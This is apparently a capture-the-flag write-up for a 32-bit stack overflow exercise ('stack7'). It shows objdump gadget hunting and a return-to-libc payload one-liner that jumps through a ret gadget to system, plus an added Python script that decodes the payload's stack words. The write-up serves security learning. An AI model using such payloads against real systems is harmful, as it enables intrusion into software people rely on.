This challenge is nearly identical to the last except that you must find a random ret to use and then jump to system.
Using the same tactics as before, I determined the address of my environment variable was at 0xbffffe63.
Now all we need is a gadget containing a RET. There are fancier, more sophisticated ways to do this, but I'm just going to use objdump.
objdump -D stack7 | grep -E 'pop\s*%e[a-d]x' -A5 | grep ret -B1
8048382: c9 leave
8048383: c3 ret
8048493: 5d pop %ebp
8048494: c3 ret
80485c8: 5d pop %ebp
80485c9: c3 ret
80485f8: 5d pop %ebp
80485f9: c3 ret
8048616: c9 leave
8048617: c3 ret
As it happens there are a few! I decided to go with the one at 0x08048383.
python -c 'print "A"*80 + "\x83\x83\x04\x08" + "\xb0\xff\xec\xb7" + "A"*4 + "\x6c\xfe\xff\xbf"'
And that works just fine!
It prints the word NONSENSE as expected.
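
The payload from the one-liner above, decoded word by word to show what each part of the overwritten stack holds. This is an added example, not part of the original write-up; the region map keyed on the top address byte is an assumption for a 32-bit Linux process without ASLR, and the helper names are hypothetical.

```python
import struct

# Payload bytes exactly as given in the one-liner above (Python 3 bytes form).
PAYLOAD = (b"A" * 80 + b"\x83\x83\x04\x08" + b"\xb0\xff\xec\xb7"
           + b"A" * 4 + b"\x6c\xfe\xff\xbf")

# Assumed region map (top byte of the address) for a 32-bit Linux
# process without ASLR. This is an assumption of the example.
REGIONS = {0x08: "binary", 0xb7: "shared library", 0xbf: "stack"}

# Role of each word after the padding, in the order the CPU consumes them.
ROLES = [
    "overwritten return address (the ret gadget)",
    "address that gadget's ret pops next (system, per the text)",
    "return address seen by system (filler)",
    "first argument to system (pointer to the string)",
]


def decode(payload, pad_len=80):
    """Split the payload into padding and little-endian 32-bit words."""
    pad, tail = payload[:pad_len], payload[pad_len:]
    if len(tail) % 4:
        raise ValueError("tail is not a whole number of 32-bit words")
    words = struct.unpack("<%dI" % (len(tail) // 4), tail)
    # Tag each word with the memory region its top byte suggests.
    return pad, [(w, REGIONS.get(w >> 24, "filler/unknown")) for w in words]


def describe(payload):
    """Return one human-readable line per stack slot."""
    pad, words = decode(payload)
    lines = ["%d bytes of padding" % len(pad)]
    for (word, region), role in zip(words, ROLES):
        lines.append("0x%08x  %-15s %s" % (word, region, role))
    return lines


if __name__ == "__main__":
    print("\n".join(describe(PAYLOAD)))
```

The first word after the padding is the only one that lands in the saved return address; it points into the binary itself, and the libc address is reached one `ret` later.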